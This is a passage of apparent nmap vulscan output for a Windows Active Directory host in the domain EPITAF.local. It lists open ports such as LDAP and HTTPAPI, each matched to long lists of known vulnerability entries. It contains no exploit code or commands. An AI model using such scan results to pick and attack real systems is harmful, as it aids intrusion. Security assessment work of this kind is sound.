[2100] Microsoft Windows RPC DCOM Interface Overflow
636	tcp	open	tcpwrapped	syn-ack
3268	tcp	open	ldap	syn-ack	Microsoft Windows Active Directory LDAP		Domain: EPITAF.local0., Site: Default-First-Site-Name
	vulscan	VulDB - https://vuldb.com: [160873] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160870] Microsoft Windows up to Server 2019 Active Directory Federation Service 2FA weak authentication [160864] Microsoft Windows up to Server 2019 Active Directory integrated DNS privilege escalation [160863] Microsoft Windows up to Server 2019 Active Directory integrated DNS memory corruption [160862] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [155092] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [149893] Microsoft Windows up to Server 2019 Active Directory privilege escalation [141620] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [139937] Microsoft Windows up to Server 2019 Azure Active Directory information disclosure [131642] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Active Directory privilege escalation [126730] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [124217] Microsoft Windows Server 2012/Server 2016 Active Directory Federation Services /adfs/ls privilege escalation [116020] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Active Directory 7PK Security Features [99683] Microsoft Windows 10 1607/10 1703/Server 2012 R2/Server 2016 Active Directory 7PK Security Features [99667] Microsoft Windows 10/Server 2016 Active Directory Service Unresponsive privilege escalation [98110] Microsoft Windows Active Directory Federation Services information disclosure [88781] Microsoft Windows 2000 Active Directory Schema privilege escalation [88644] Microsoft Windows 2000 Active Directory Kerberos Ticket Logging privilege escalation [87960] Microsoft Windows Server 2008 R2/Server 2012/Server 2012 R2 Active Directory privilege escalation [80878] Microsoft Windows Server 2012 R2 Active Directory Federation Service privilege escalation [77640] Microsoft Windows Active Directory Code [75783] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services cross site scripting [74834] Microsoft Windows Server 2012 R2 Active Directory Federation Services 3.0 privilege escalation [45063] Microsoft Windows Server 2003 Active Directory information disclosure [26516] Microsoft Windows 95/98/ME/NT 4.0 Active Directory unknown vulnerability [19970] Microsoft Windows 2000 Active Directory privilege escalation [10190] Microsoft Windows 7/8/Server 2008/Vista Active Directory privilege escalation [9929] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services information disclosure [4474] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Active Directory Query memory corruption [4440] Microsoft Windows Active Directory weak authentication [4364] Microsoft Windows Active Directory cross site scripting [4067] Microsoft Windows Active Directory Federation Service privilege escalation [4058] Microsoft Windows Active Directory denial of service [3845] Microsoft Windows 2000 SP4 Active Directory denial of service [3733] Microsoft Windows Active Directory privilege escalation [3179] Microsoft Windows Active Directory denial of service [3178] Microsoft Windows Active Directory memory corruption [2689] Microsoft Windows up to 2000 SP4 Active Directory denial of service [145] Microsoft Windows 2000 Active Directory weak authentication [134] Microsoft Windows up to 2000 SP3 Active Directory memory corruption [157918] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151146] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151100] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [151097] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [146442] F5 BIG-IP Active Directory/LDAP/Client Certificate weak authentication [145356] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [140066] Microsoft NuGet/ADAL.NET Azure Active Directory privilege escalation [136274] Microsoft Windows up to Server 2019 ActiveX memory corruption [134752] Microsoft Azure Active Directory Connect 1.3.20.0 PowerShell privilege escalation [131628] Microsoft Windows up to Server 2019 ActiveX memory corruption [123141] Samba up to 4.6.15/4.7.8/4.8.3 Active Directory LDAP Server information disclosure [121120] Microsoft Active Directory Federation Services Web Customizations cross site scripting [101011] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 ActiveX Object Memory information disclosure [99685] Microsoft Windows up to Vista SP2 LDAP privilege escalation [92249] Microsoft Azure Active Directory Passport up to 1.4.5/2.0.0 weak authentication [79863] Samba up to 4.3.2 Windows Active Directory Server privilege escalation [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal [68590] Microsoft Windows up to Vista TS WebProxy directory traversal [66445] Microsoft Windows 8.0/8.1 XMLDOM ActiveX Control privilege escalation [51811] Microsoft Windows max3activex.dll privilege escalation [51497] Microsoft Windows Live Messenger 2009 ActiveX Control msnmsgr.exe denial of service [48518] Microsoft ADAM XP Active Directory denial of service [46007] Microsoft Windows Mobile 6.0 FTP Service directory traversal [43982] Microsoft Windows Image Acquisition Logger ActiveX Control privilege escalation [43953] Microsoft Windows ActiveX Control wmex.dll memory corruption [43659] Microsoft Windows Messenger 5.1 ActiveX Control information disclosure [42638] Microsoft Windows Installer 3.1.4000.1823 ActiveX Control msiexec.exe memory corruption [20978] Microsoft Windows Server 2003 Shell Link directory traversal [20961] Microsoft Windows up to 2000 SP4 Troubleshooter ActiveX Control Tshoot.ocx RunQuery2 memory corruption [19042] Microsoft Windows NT 4.0/2000/XP HTML Help ActiveX Control hhctrl.ocx alink memory corruption [18810] Microsoft Windows up to XP Certificate Enrollment ActiveX Control unknown vulnerability [18709] Microsoft Windows HTML Help ActiveX Control Winhlp32.exe memory corruption [16706] Microsoft Windows Media Player 7 WMP ActiveX Control privilege escalation [16098] Microsoft Windows NT 4.0 Cenroll ActiveX Control xenroll.dll denial of service [16055] Microsoft Windows 2000 System Monitor ActiveX Control memory corruption [14976] Microsoft Windows Media Player ActiveX Control File information disclosure [14348] Microsoft Windows NT Directory privilege escalation [8203] Microsoft Windows up to 2012 AD LDAP Query privilege escalation [4452] Microsoft Windows Adctive Directory Query memory corruption [4447] Microsoft Windows Time ActiveX Control privilege escalation [4050] Microsoft Windows ActiveX Control memory corruption [4049] Microsoft Windows ActiveX Controls ATL OleLoadFromStream privilege escalation [4026] Microsoft Windows DHTML Editing ActiveX Control privilege escalation [3674] Microsoft Windows ActiveX Control hxvz.dll privilege escalation [3309] Microsoft Visual Studio 6 ActiveX Control VBTOVSI.dll directory traversal [3308] Microsoft Visual Studio 6 ActiveX Control PDWizard.ocx directory traversal [2925] Microsoft Windows HTML Help ActiveX Control memory corruption [2687] Microsoft Windows 2000/Server 2003/XP Agent ActiveX Numeric Error [908] Microsoft Windows XP JPEG ActiveX Image Control asycpict.dll denial of service [155] Microsoft Windows up to 2000 SP3 LDAP Cryptnet.DLL denial of service MITRE CVE - https://cve.mitre.org: [CVE-2011-2014] The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not examine Certificate Revocation Lists (CRLs), which allows remote authenticated users to bypass intended certificate restrictions and access Active Directory resources by leveraging a revoked X.509 certificate for a domain account, aka "LDAPS Authentication Bypass Vulnerability." [CVE-2009-1928] Stack consumption vulnerability in the LDAP service in Active Directory on Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2 [CVE-2009-1139] Memory leak in the LDAP service in Active Directory on Microsoft Windows 2000 SP4 and Server 2003 SP2, and Active Directory Application Mode (ADAM) on Windows XP SP2 and SP3 and Server 2003 SP2, allows remote attackers to cause a denial of service (memory consumption and service outage) via (1) LDAP or (2) LDAPS requests with unspecified OID filters, aka "Active Directory Memory Leak Vulnerability." [CVE-2009-1138] The LDAP service in Active Directory on Microsoft Windows 2000 SP4 does not properly free memory for LDAP and LDAPS requests, which allows remote attackers to execute arbitrary code via a request that uses hexadecimal encoding, whose associated memory is not released, related to a "DN AttributeValue," aka "Active Directory Invalid Free Vulnerability." NOTE: this issue is probably a memory leak. [CVE-2008-5112] The LDAP server in Active Directory in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 responds differently to a failed bind attempt depending on whether the user account exists and is permitted to login, which allows remote attackers to enumerate valid usernames via a series of LDAP bind requests, as demonstrated by ldapuserenum. [CVE-2008-4023] Active Directory in Microsoft Windows 2000 SP4 does not properly allocate memory for (1) LDAP and (2) LDAPS requests, which allows remote attackers to execute arbitrary code via a crafted request, aka "Active Directory Overflow Vulnerability." [CVE-2008-1445] Active Directory on Microsoft Windows 2000 Server SP4, XP Professional SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to cause a denial of service (system hang or reboot) via a crafted LDAP request. [CVE-2008-0088] Unspecified vulnerability in Active Directory on Microsoft Windows 2000 and Windows Server 2003, and Active Directory Application Mode (ADAM) on XP and Server 2003, allows remote attackers to cause a denial of service (hang and restart) via a crafted LDAP request. [CVE-2007-3028] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4 does not properly check "the number of convertible attributes", which allows remote attackers to cause a denial of service (service unavailability) via a crafted LDAP request, related to "client sent LDAP request logic," aka "Windows Active Directory Denial of Service Vulnerability". NOTE: this is probably a different issue than CVE-2007-0040. [CVE-2007-0040] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4, Server 2003 SP1 and SP2, Server 2003 x64 Edition and SP2, and Server 2003 for Itanium-based Systems SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted LDAP request with an unspecified number of "convertible attributes." [CVE-2013-1282] The LDAP service in Microsoft Active Directory, Active Directory Application Mode (ADAM), Active Directory Lightweight Directory Service (AD LDS), and Active Directory Services allows remote attackers to cause a denial of service (memory consumption and service outage) via a crafted query, aka "Memory Consumption Vulnerability." [CVE-2011-3406] Buffer overflow in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote authenticated users to execute arbitrary code via a crafted query that leverages incorrect memory initialization, aka "Active Directory Buffer Overflow Vulnerability." [CVE-2011-1264] Cross-site scripting (XSS) vulnerability in Active Directory Certificate Services Web Enrollment in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Active Directory Certificate Services Vulnerability." [CVE-2011-1247] Untrusted search path vulnerability in the Microsoft Active Accessibility component in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Active Accessibility Insecure Library Loading Vulnerability." [CVE-2011-0654] Integer underflow in the BowserWriteErrorLogEntry function in the Common Internet File System (CIFS) browser service in Mrxsmb.sys or bowser.sys in Active Directory in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via a malformed BROWSER ELECTION message, leading to a heap-based buffer overflow, aka "Browser Pool Corruption Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2011-0040] The server in Microsoft Active Directory on Windows Server 2003 SP2 does not properly handle an update request for a service principal name (SPN), which allows remote attackers to cause a denial of service (authentication downgrade or outage) via a crafted request that triggers name collisions, aka "Active Directory SPN Validation Vulnerability." [CVE-2010-0820] Heap-based buffer overflow in the Local Security Authority Subsystem Service (LSASS), as used in Active Directory in Microsoft Windows Server 2003 SP2 and Windows Server 2008 Gold, SP2, and R2 [CVE-2009-2509] Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly validate headers in HTTP requests, which allows remote authenticated users to execute arbitrary code via a crafted request to an IIS web server, aka "Remote Code Execution in ADFS Vulnerability." [CVE-2009-2508] The single sign-on implementation in Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly remove credentials at the end of a network session, which allows physically proximate attackers to obtain the credentials of a previous user of the same web browser by using data from the browser's cache, aka "Single Sign On Spoofing in ADFS Vulnerability." [CVE-2008-3539] Unspecified vulnerability in HP OpenView Select Identity (HPSI) Connectors on Windows, as used in HPSI Active Directory Connector 2.30 and earlier, HPSI SunOne Connector 1.14 and earlier, HPSI eDirectory Connector 1.12 and earlier, HPSI eTrust Connector 1.02 and earlier, HPSI OID Connector 1.02 and earlier, HPSI IBM Tivoli Dir Connector 1.02 and earlier, HPSI TOPSecret Connector 2.22.001 and earlier, HPSI RACF Connector 1.12.001 and earlier, HPSI ACF2 Connector 1.02 and earlier, HPSI OpenLDAP Connector 1.02 and earlier, and HPSI BiDir DirX Connector 1.00.003 and earlier, allows local users to obtain sensitive information via unknown vectors. [CVE-2007-2999] Microsoft Windows Server 2003, when time restrictions are in effect for user accounts, generates different error messages for failed login attempts with a valid user name than for those with an invalid user name, which allows context-dependent attackers to determine valid Active Directory account names. [CVE-2005-3169] Microsoft Windows 2000 before Update Rollup 1 for SP4, when the "audit directory service access" policy is enabled, does not record a 565 event message for File Delete Child operations on an Active Directory object in the security event log, which could allow attackers to conduct unauthorized activities without detection. [CVE-2005-0545] Microsoft Windows XP Pro SP2 and Windows 2000 Server SP4 running Active Directory allow local users to bypass group policies that restrict access to hidden drives by using the browse feature in Office 10 applications such as Word or Excel, or using a flash drive. NOTE: this issue has been disputed in a followup post. [CVE-2003-0533] Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm. [CVE-2003-0507] Stack-based buffer overflow in Active Directory in Windows 2000 before SP4 allows remote attackers to cause a denial of service (reboot) and possibly execute arbitrary code via an LDAP version 3 search request with a large number of (1) "AND," (2) "OR," and possibly other statements, which causes LSASS.EXE to crash. [CVE-2002-2328] Active Directory in Windows 2000, when supporting Kerberos V authentication and GSSAPI, allows remote attackers to cause a denial of service (hang) via an LDAP client that sets the page length to zero during a large request. SecurityFocus - https://www.securityfocus.com/bid/: [31609] Microsoft Windows Active Directory LDAP Request Handling Remote Code Execution Vulnerability [29584] Microsoft Windows Active Directory LDAP Request Validation Remote Denial Of Service Vulnerability [27638] Microsoft Windows Active Directory LDAP Request Validation Remote Denial Of Service Vulnerability [24800] Microsoft Windows Active Directory LDAP Request Validation Remote Code Execution Vulnerability [24796] Microsoft Windows Active Directory LDAP Request Validation Remote Denial Of Service Vulnerability [97448] Microsoft Windows Active Directory CVE-2017-0164 Denial of Service Vulnerability [91118] Microsoft Windows Active Directory CVE-2016-3226 Denial of Service Vulnerability [90065] Microsoft Windows Kernel 'Win32k.sys' CVE-2016-0174 Local Privilege Escalation Vulnerability [62184] Microsoft Windows Active Directory CVE-2013-3868 Denial of Service Vulnerability [58848] Microsoft Windows Active Directory CVE-2013-1282 Denial of Service Vulnerability [50570] Microsoft Active Directory LDAPS Authentication Bypass Vulnerability [37215] Microsoft Windows Active Directory Single Sign On Authentication Spoofing Vulnerability [36918] Microsoft Active Directory LDAP Request Stack Exhaustion Denial Of Service Vulnerability [35226] Microsoft Active Directory Encoded LDAP String Memory Corruption Remote Code Execution Vulnerability [32305] Microsoft Active Directory LDAP Server Username Enumeration Weakness [8093] Microsoft Windows 2000 Active Directory Forest Origin Validation Vulnerability [7930] Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability [7330] Microsoft Windows Active Directory Policy Bypass Vulnerability IBM X-Force - https://exchange.xforce.ibmcloud.com: [50761] Microsoft Windows Active Directory LDAP denial of service [50759] Microsoft Windows 2000 Active Directory LDAP code execution [45585] Microsoft Windows Active Directory LDAP search buffer overflow [42668] Microsoft Windows Active Directory LDAP request denial of service [40102] Microsoft Windows Active Directory LDAP request denial of service [35180] Microsoft Windows Active Directory LDAP denial of service [35179] Microsoft Windows Active Directory LDAP attribute buffer overflow [86072] Microsoft Windows Active Directory Federation Services information disclosure [71559] Microsoft Windows Active Directory buffer overflow [70950] Microsoft Windows Active Directory privilege escalation [67750] Microsoft Windows Active Directory Certificate Services Web Enrollment cross-site scripting [64915] Microsoft Windows Active Directory denial of service [54426] Microsoft Windows Active Directory Federation Services (ADFS) code execution [54425] Microsoft Windows Active Directory Federation Services (ADFS) spoofing [34634] Microsoft Windows Server 2003 Active Directory information disclosure [29737] Microsoft Active Directory maximum LDAP connections reached [12489] Microsoft Windows 2000 Server Active Directory buffer overflow Exploit-DB - https://www.exploit-db.com: [22782] Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability [30825] Microsoft Windows Media Digital Rights Management ActiveX Control Buffer Overflow Vulnerability [29630] Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability [20371] Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability [19731] microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal [11195] Microsoft Windows Defender ActiveX Heap Overflow PoC OpenVAS (Nessus) - http://www.openvas.org: [902487] Microsoft Windows Active Directory LDAPS Authentication Bypass Vulnerability (2630837) [902290] Microsoft Windows Active Directory SPN Denial of Service (2478953) [901048] Microsoft Windows Active Directory Denial of Service Vulnerability (973309) [900566] Microsoft Active Directory LDAP Remote Code Execution Vulnerability (969805) [801598] Microsoft Windows2k3 Active Directory 'BROWSER ELECTION' Buffer Overflow Vulnerability SecurityTracker - https://www.securitytracker.com: [1028405] Microsoft Active Directory LDAP Processing Flaw Lets Remote Users Deny Service [1021042] Microsoft Active Directory LDAP Memory Allocation Error Lets Remote Users Execute Arbitrary Code [1020229] Microsoft Active Directory LDAP Validation Bug Lets Remote Users Deny Service [1018355] Windows Active Directory Bug in Processing LDAP Convertible Attributes Lets Remote Users Execute Arbitrary Code [1007093] Microsoft Active Directory Stack Overflow in 'Lsaas.exe' Lets Remote Users Crash the Windows 2000 Server [1028908] Microsoft Active Directory Federation Services Discloses Account Information to Remote Users [1026412] Microsoft Active Directory Memory Access Error Lets Remote Authenticated Users Execute Arbitrary Code [1026294] Microsoft Active Directory CRL Validation Flaw Lets Remote Users Bypass Authentication [1025653] Microsoft Active Directory Input Validation Flaw in Certificate Services Web Enrollment Permits Cross-Site Scripting Attacks [1025330] Microsoft WMITools and Windows Messenger ActiveX Controls Let Remote Users Execute Arbitrary Code [1025086] Microsoft Active Directory Heap Overflow in Processing BROWSER ELECTION Packets May Let Remote Users Execute Arbitrary Code [1025042] Microsoft Active Directory SPN Collosions May Let Remote Authenticated Users Deny Service [1023296] Microsoft Active Directory Federation Services Lets Remote Authenticated Users Execute Arbitrary Code and Spoof Web Sites [1023156] Microsoft Active Directory Stack Memory Consumption Flaw Lets Remote Users Deny Service [1022349] Microsoft Active Directory Bugs Let Remote Users Execute Arbitrary Code or Deny Service [1021369] Microsoft Visual Basic DataGrid/FlexGrid/Heirarchival FlexGrid/Windows Common/Charts ActiveX Controls Let Remote Users Execute Arbitrary Code [1020512] HP OpenView Select Identity Unspecified Flaw in Active Directory Bidirectional LDAP Connector Lets Remote Users Access the System [1019382] Active Directory LDAP Processing Bug Lets Remote Users Deny Service [1011233] WebLogic Active Directory LDAP Error May Fail to Disable User Accounts [1009767] Microsoft Windows 2000 Domain Controller LDAP Flaw May Let Remote Users Restart the Authentication Service [1007932] Microsoft Windows Troubleshooter ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1007905] Microsoft Windows Server 2003 Shell Folders Can Be Referenced Using Directory Traversal Characters [1005150] Microsoft Windows Operating System Certificate Enrollment ActiveX Control Allows Remote Users to Delete Certificates on a Target User's System [1004441] Microsoft Windows Help System Buffer Overflows in 'htctrl.ocx' ActiveX Control May Let Remote Users Execute Arbitrary Code on a Target User's Computer By Sending Malicious HTML [1004369] Microsoft Active Directory May Have Bug That Allows Remote Users to Crash the Directory [1003420] Microsoft Site Server Commerce Edition Discloses Potentially Sensitive Administration Information and Source Code to Remote Users With Valid Accounts and Discloses User Passwords from the LDAP Directory to Anonymous Remote Users [1003075] ActivePerl for Windows Discloses Directory Path Location to Remote Users [1001832] Microsoft Windows 2000 LDAP Server Lets Remote Users Gain Administrator Access to the Domain Controller When Configured to Support LDAP over SSL OSVDB - http://www.osvdb.org: [92126] Microsoft Windows Multiple Active Directory Components LDAP Crafted Query Handling Memory Consumption Remote DoS [76902] Microsoft Windows Active Directory LDAPS CRL Handling Weakness Authentication Bypass [60210] Microsoft Windows Active Directory Malformed LDAP Client Request Remote DoS [59856] Microsoft Windows Active Directory Malformed LDAP Request Stack Exhaustion Remote DoS [54938] Microsoft Windows Active Directory Crafted LDAP(S) Request Handling Remote DoS [54937] Microsoft Windows Active Directory Crafted LDAP(S) Request Hexdecimal DN AttributeValue Handling Arbitrary Code Execution [50000] Microsoft Windows Active Directory LDAP Server Bind Request User Account Enumeration [49058] Microsoft Windows Active Directory LDAP(S) Request Handling Remote Overflow [46066] Microsoft Windows Active Directory LDAP Request Processing Remote DoS [35961] Microsoft Windows Active Directory LDAP Service Crafted Request Remote DoS [35960] Microsoft Windows Active Directory LDAP Service Convertible Attribute Remote Code Execution [15379] Microsoft Windows ActiveDirectory LDAP Authentication Bypass [77667] Microsoft Windows Active Directory Query Parsing Remote Overflow [72937] Microsoft Windows Active Directory Certificate Services Web Enrollment XSS [72670] Microsoft Windows Server 2003 ActiveDirectory BROWSER ELECTION Remote Overflow [70825] Microsoft Windows Server Active Directory Server Principal Name (SPN) Handling Remote DoS [60836] Microsoft Windows Active Directory Federation Services (ADFS) Request Header Handling Remote Code Execution [60835] Microsoft Windows Active Directory Federation Services (ADFS) Single Sign-on Spoofing [41461] Microsoft Active Directory / ADAM Malformed LDAP Request Remote DoS [36138] Microsoft Windows Active Directory Time Restriction User Enumeration [30405] Microsoft Windows Active Directory Unspecified DoS [12655] Microsoft Windows Active Directory LSASS.EXE DoS [2237] Microsoft Windows 2000 Active Directory Lsass.exe Overflow [1297] Microsoft Windows 2000 Active Directory Object Attribute
3269	tcp	open	tcpwrapped	syn-ack
5357	tcp	open	http	syn-ack	Microsoft HTTPAPI httpd	2.0	SSDP/UPnP
	http-csrf	Couldn't find any CSRF vulnerabilities.
	http-dombased-xss	Couldn't find any DOM based XSS.
	http-server-header	Microsoft-HTTPAPI/2.0
	vulscan	VulDB - https://vuldb.com: [176520] Microsoft Windows 10 20H2 up to Server 2004 DWM Core Library unknown vulnerability [176499] Microsoft Windows 10 20H2/10 21H1/10 2004/Server 20H2/Server 2004 Bind Filter Driver information disclosure [176494] Microsoft Windows 10 20H2 up to Server 2004 Kernel information disclosure [174866] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174865] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 HTTP Protocol Stack unknown vulnerability [174863] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174862] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174847] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Desktop Bridge denial of service [174845] Microsoft Windows 10 20H2 up to 10 2004 WalletService unknown vulnerability [174841] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Media Foundation Core unknown vulnerability [174835] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB Client Security Feature unknown vulnerability [172920] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB information disclosure [171009] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V unknown vulnerability [169521] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Network File System denial of service [167636] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V denial of service [160939] Microsoft Windows up to Server 2004 InstallService privilege escalation [160911] Microsoft Windows up to Server 2004 StartTileData.dll privilege escalation [160905] Microsoft Windows up to Server 2004 StartTileData.dll information disclosure [160903] Microsoft Windows 10 2004 Shell Infrastructure privilege escalation [160868] Microsoft Windows 10 2004/Server 2004 Projected Filesystem privilege escalation [159510] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4.7.2/4.8 privilege escalation [159509] Microsoft Windows 10 1909/10 2004 Codecs Library memory corruption [159500] Microsoft Windows up to Server 2004 Codecs Library memory corruption [159496] Microsoft Windows up to 10 2004 Codecs Library memory corruption [157988] Microsoft Windows 10 2004/Server 2004 Subsystem for Linux privilege escalation [157973] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157972] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157971] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157970] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157969] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157968] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157881] Microsoft Windows up to Server 2004 Font Driver Host memory corruption [156422] Microsoft Windows 10 2004/Server 2004 SMBv3 denial of service [156421] Microsoft Windows up to Server 2004 SMBv3 information disclosure [156410] Microsoft Windows up to Server 2004 Windows Runtime privilege escalation [156401] Microsoft Windows up to Server 2004 Kernel privilege escalation [156399] Microsoft Windows up to Server 2004 Kernel privilege escalation [156386] Microsoft Windows up to Server 2004 GDI+ memory corruption [156381] Microsoft Windows up to Server 2004 Kernel privilege escalation [156370] Microsoft Windows 10 2004/Server 2004 Connected User Experiences/Telemetry Service privilege escalation [156360] Microsoft Windows up to Server 2004 Windows Service information disclosure [156349] Microsoft Windows up to Server 2004 Update Orchestrator Service privilege escalation [156303] Microsoft Windows 10 1709/10 1803/10 1809/10 1903/Server 2004 Feedback Hub privilege escalation [155152] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Media Foundation memory corruption [153197] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [149948] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [146875] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 COM Server privilege escalation [146803] Microsoft Visual Studio 2008 Express XML External Entity [145342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k Graphics memory corruption [143116] Microsoft Windows 7 SP1/Server 2008 R2 SP1 GDI information disclosure [143115] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k memory corruption [143114] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [143099] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 NTLMv2 weak encryption [141625] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 DirectX memory corruption [141624] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Graphics Component information disclosure [139966] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel information disclosure [139923] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Graphics Component information disclosure [139905] Microsoft Windows Server 2008 SP2 DHCP Server memory corruption [137573] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137567] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137566] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137565] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137564] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136343] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136341] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136316] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136315] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136313] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136311] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136309] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136302] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136298] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136297] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [131683] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [131642] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Active Directory privilege escalation [127822] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 Kernel information disclosure [125103] Microsoft Windows Server 2008 SP2 Graphics Component information disclosure [123853] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel Memory information disclosure [122858] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 LNK privilege escalation 